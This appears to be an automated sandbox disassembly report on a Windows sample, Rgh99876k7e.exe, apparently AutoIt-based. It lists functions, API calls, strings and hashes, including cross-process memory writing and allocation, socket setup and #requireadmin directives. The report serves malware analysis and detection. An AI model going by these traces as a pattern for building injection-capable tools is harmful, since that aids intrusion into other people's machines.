                          • __dosmaperr.LIBCMT ref: 00738B81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide__dosmaperr
                          • String ID: .r
                          • API String ID: 2434981716-397233886
                          • Opcode ID: 1b211b90c26ee4d8fb117371172e26d45aefd3a7ac542dd3226104aac18483ec
                          • Instruction ID: c313e61d10a250a0f4bd2ade40218e3f1216e87c8e1912833b5c6d1aadf8bd0d
                          • Opcode Fuzzy Hash: 1b211b90c26ee4d8fb117371172e26d45aefd3a7ac542dd3226104aac18483ec
                          • Instruction Fuzzy Hash: A2418EF0604256AFEB659F24C880A7DBFE5EB46300F2885AAF49487253DE3D8C029795
                          Function 00762716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0076B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007621D0,?,?,00000034,00000800,?,00000034), ref: 0076B42D
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00762760
                            • Part of subcall function 0076B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0076B3F8
                            • Part of subcall function 0076B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0076B355
                            • Part of subcall function 0076B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00762194,00000034,?,?,00001004,00000000,00000000), ref: 0076B365
                            • Part of subcall function 0076B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00762194,00000034,?,?,00001004,00000000,00000000), ref: 0076B37B
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007627CD
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0076281A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: c57093eb8033d4e61e4376b8c2a701488e8339dbdf5d8449d492ee04ff7c4f31
                          • Instruction ID: 208e77c049ecb1b68597838de09104ce7cb815b4c6e4bc41a880dc53a073ee93
                          • Opcode Fuzzy Hash: c57093eb8033d4e61e4376b8c2a701488e8339dbdf5d8449d492ee04ff7c4f31
                          • Instruction Fuzzy Hash: FD410D76900218AFDB11DFA4CD45EEEBBB8EF05700F108095FA56B7181DB746E85CB61
                          Function 0073172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Rgh99876k7e.exe,00000104), ref: 00731769
                          • _free.LIBCMT ref: 00731834
                          • _free.LIBCMT ref: 0073183E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\Desktop\Rgh99876k7e.exe
                          • API String ID: 2506810119-2052860485
                          • Opcode ID: 00f59be5943c0b46d744ec857768301719f91e99f280843f202293c7579c2fc1
                          • Instruction ID: 7e7111094fae95308eef390ff526a10ba037a0c2cc977f81f1102a0265b3ea2a
                          • Opcode Fuzzy Hash: 00f59be5943c0b46d744ec857768301719f91e99f280843f202293c7579c2fc1
                          • Instruction Fuzzy Hash: FB318075A00218FFEB21DB999C85D9EBBFCEB85320F9481A7F40497212D6789E40CB94
                          Function 0076C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0076C306
                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0076C34C
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007D1990,01916C88), ref: 0076C395
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem
                          • String ID: 0
                          • API String ID: 135850232-4108050209
                          • Opcode ID: dce16f70706a6135da34941cd71f3193ecc38f39be6728313d1f6945b4a7ce56
                          • Instruction ID: 5f790ca760f7de6e83541f336fd71f8fb40f6a9560314ba4222201cc5882d724
                          • Opcode Fuzzy Hash: dce16f70706a6135da34941cd71f3193ecc38f39be6728313d1f6945b4a7ce56
                          • Instruction Fuzzy Hash: BE418F31204301DFD721DF26D845B6ABBE8AB85310F14861EFDA6973D1D738E905CB66
                          Function 00794416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0079CC08,00000000,?,?,?,?), ref: 007944AA
                          • GetWindowLongW.USER32 ref: 007944C7
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007944D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: d69862c42d5e352b453bfd6e558d5870cbbd79edd3135ad2b9384a276de11222
                          • Instruction ID: 66163adec5f6de781a20d3ea8c9ef4accb94100de98550cd01d21553feeff915
                          • Opcode Fuzzy Hash: d69862c42d5e352b453bfd6e558d5870cbbd79edd3135ad2b9384a276de11222
                          • Instruction Fuzzy Hash: C131DE31200205AFDF218E78EC45FEA7BA9EB08334F204319F979921E0D778EC629B50
                          Function 00766E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SysReAllocString.OLEAUT32(?,?), ref: 00766EED
                          • VariantCopyInd.OLEAUT32(?,?), ref: 00766F08
                          • VariantClear.OLEAUT32(?), ref: 00766F12
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$AllocClearCopyString
                          • String ID: *jv
                          • API String ID: 2173805711-3975105792
                          • Opcode ID: dd6e226a1ef5316e45fe74caea179f12bd292da965113b276bd6e1c710efcab7
                          • Instruction ID: c007abb9606d954757dbf04d006de9c68d5a179965a4423b35d81b5012ae2758
                          • Opcode Fuzzy Hash: dd6e226a1ef5316e45fe74caea179f12bd292da965113b276bd6e1c710efcab7
                          • Instruction Fuzzy Hash: F531AD72604245DBCB05AFA4E8959FE37B6FF84704B5005ADF8035B2A1CB3C9E12DB94
                          Function 0078304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0078335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00783077,?,?), ref: 00783378
                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0078307A
                          • _wcslen.LIBCMT ref: 0078309B
                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00783106
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 946324512-2422070025
                          • Opcode ID: 81db4abb209aa17bde275aeb6830b1bb9710bd43eab1880a7076778b28e35f8a
                          • Instruction ID: ca5902dabb93bbef5c9aadb32b522afa696ac481f7305db7e30219021f12eb07
                          • Opcode Fuzzy Hash: 81db4abb209aa17bde275aeb6830b1bb9710bd43eab1880a7076778b28e35f8a
                          • Instruction Fuzzy Hash: 7531D335604205DFCB10EF2CC489EAA77E1EF14B18F248159E9168B392DB7AEE42C760
                          Function 00794653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00794705
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00794713
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0079471A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          • Opcode ID: 962a41e7ee779602ba1793d54ef184bf4437bd7977a829c3308e00d7ab7619b7
                          • Instruction ID: 89852a868122cce20c4dfa087977cf7be7cea369d4e984d1dc2e2c0ff46f0580
                          • Opcode Fuzzy Hash: 962a41e7ee779602ba1793d54ef184bf4437bd7977a829c3308e00d7ab7619b7
                          • Instruction Fuzzy Hash: DB214CB5600208AFDB11DF64EC95DBA37ADEB5A394B440059FA009B291DB38EC12CA60
                          Function 007695AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 176396367-2734436370
                          • Opcode ID: f2090c1d41ded59c78e8e6026808bca1aa59350cb6c487a4c6dc369588105e65
                          • Instruction ID: 15679282cf958e4838065df58d405d0cd99c15d83d7718e47ab3d2f2dfb7bd8f
                          • Opcode Fuzzy Hash: f2090c1d41ded59c78e8e6026808bca1aa59350cb6c487a4c6dc369588105e65
                          • Instruction Fuzzy Hash: 86212672604620A6C731AA24E806FB773DCDF51300F14402AFE5BA7082EB7DAD55C296
                          Function 007937B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00793840
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00793850
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00793876
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: 13750b056b4381fc35e6cdf939bfef9be3de92ee143b8c82a7a0e3798d1ea2aa
                          • Instruction ID: 6b6cc2b80485cf5b1766d2bf89d5110f58a276b4a148a36b48db5830852545a6
                          • Opcode Fuzzy Hash: 13750b056b4381fc35e6cdf939bfef9be3de92ee143b8c82a7a0e3798d1ea2aa
                          • Instruction Fuzzy Hash: 8921A472610118BBEF21DF94DC85FBB376EEF89764F108115F9059B190C679DC5287A0
                          Function 007749F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00774A08
                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00774A5C
                          • SetErrorMode.KERNEL32(00000000,?,?,0079CC08), ref: 00774AD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume
                          • String ID: %lu
                          • API String ID: 2507767853-685833217
                          • Opcode ID: 882e90392f92b2ebd6bab3fe67837afb51162779cf4ce12753857f4826d81afe
                          • Instruction ID: 9dbaaa11ebdcb5e296f287f22318d4e1beda70bdee652d00254e4f92039479a0
                          • Opcode Fuzzy Hash: 882e90392f92b2ebd6bab3fe67837afb51162779cf4ce12753857f4826d81afe
                          • Instruction Fuzzy Hash: 28313075A00109EFDB11DF64C885EAA7BF8EF04304F1580A9E909DB392D779ED46CB61
                          Function 007941EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0079424F
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00794264
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00794271
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: 7a3f003fcc96a9dd7ec00360211f4d9a14b82f6ce02d6c7c701a16354230d9e4
                          • Instruction ID: 2d32b8d6ff0803a78acefa314915fc02f5f2f4f21ae945c3fea86ec44d0c43b4
                          • Opcode Fuzzy Hash: 7a3f003fcc96a9dd7ec00360211f4d9a14b82f6ce02d6c7c701a16354230d9e4
                          • Instruction Fuzzy Hash: E5110632240208BEEF209F29DC06FAB3BACFF85B64F110528FA55E2190D675DC529B20
                          Function 00762F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                            • Part of subcall function 00762DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00762DC5
                            • Part of subcall function 00762DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00762DD6
                            • Part of subcall function 00762DA7: GetCurrentThreadId.KERNEL32 ref: 00762DDD
                            • Part of subcall function 00762DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00762DE4
                          • GetFocus.USER32 ref: 00762F78
                            • Part of subcall function 00762DEE: GetParent.USER32(00000000), ref: 00762DF9
                          • GetClassNameW.USER32(?,?,00000100), ref: 00762FC3
                          • EnumChildWindows.USER32(?,0076303B), ref: 00762FEB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                          • String ID: %s%d
                          • API String ID: 1272988791-1110647743
                          • Opcode ID: 49c9ae8feaff690b16900ca7cb2912a28a3bd890942c63a59c22277da06a82c3
                          • Instruction ID: 033e3dcbfa8d79805b5eeb6eec8c25ef5b31272ee93bf0057809c73746d30108
                          • Opcode Fuzzy Hash: 49c9ae8feaff690b16900ca7cb2912a28a3bd890942c63a59c22277da06a82c3
                          • Instruction Fuzzy Hash: 4B11C0B1300205EBDF556F60CC99EED37AAAF84304F148075FD0A9B292DE38994ACB70
                          Function 00795882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007958C1
                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007958EE
                          • DrawMenuBar.USER32(?), ref: 007958FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw
                          • String ID: 0
                          • API String ID: 3227129158-4108050209
                          • Opcode ID: 112da67497ad3ac712774feae4f29e4b8ba94252e8bbb423654b52997cf560d8
                          • Instruction ID: f816ed6f9a5a8b93635bf2c6aa51a2b784738b0c65450265c7b6ebb5af77bfa9
                          • Opcode Fuzzy Hash: 112da67497ad3ac712774feae4f29e4b8ba94252e8bbb423654b52997cf560d8
                          • Instruction Fuzzy Hash: CA018431500228EFDF129F15EC44BEEBBB4FF45760F108099E849D6151DB389A94DF21
                          Function 0076007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a41a80a593d8bdf7ad1a414d7430bf2da412c8765f029589c51d35b8b3b99fcf
                          • Instruction ID: 1abb453d1deb80e51408aa3baf7824a04de7999fe8461bf637e3d894525fef2a
                          • Opcode Fuzzy Hash: a41a80a593d8bdf7ad1a414d7430bf2da412c8765f029589c51d35b8b3b99fcf
                          • Instruction Fuzzy Hash: 3AC16D75A0020AEFDB14CFA8C898EAEB7B5FF48314F108598E906EB251D735ED41DB90
                          Function 0078342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearInitInitializeUninitialize
                          • String ID:
                          • API String ID: 1998397398-0
                          • Opcode ID: 215feee43135745ebfbc78c8188b1a2190a7d3f68b57ab1f775ab84e1faaf8fe
                          • Instruction ID: 1af5f84049824ba4e961c970b3ed239d383f487a199b5d645cf60296faee67fa
                          • Opcode Fuzzy Hash: 215feee43135745ebfbc78c8188b1a2190a7d3f68b57ab1f775ab84e1faaf8fe
                          • Instruction Fuzzy Hash: 9EA14F75604301DFCB05EF28C889A6AB7E5FF88714F048959F9899B3A1DB38EE41CB51
                          Function 00760436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0079FC08,?), ref: 007605F0
                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0079FC08,?), ref: 00760608
                          • CLSIDFromProgID.OLE32(?,?,00000000,0079CC40,000000FF,?,00000000,00000800,00000000,?,0079FC08,?), ref: 0076062D
                          • _memcmp.LIBVCRUNTIME ref: 0076064E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
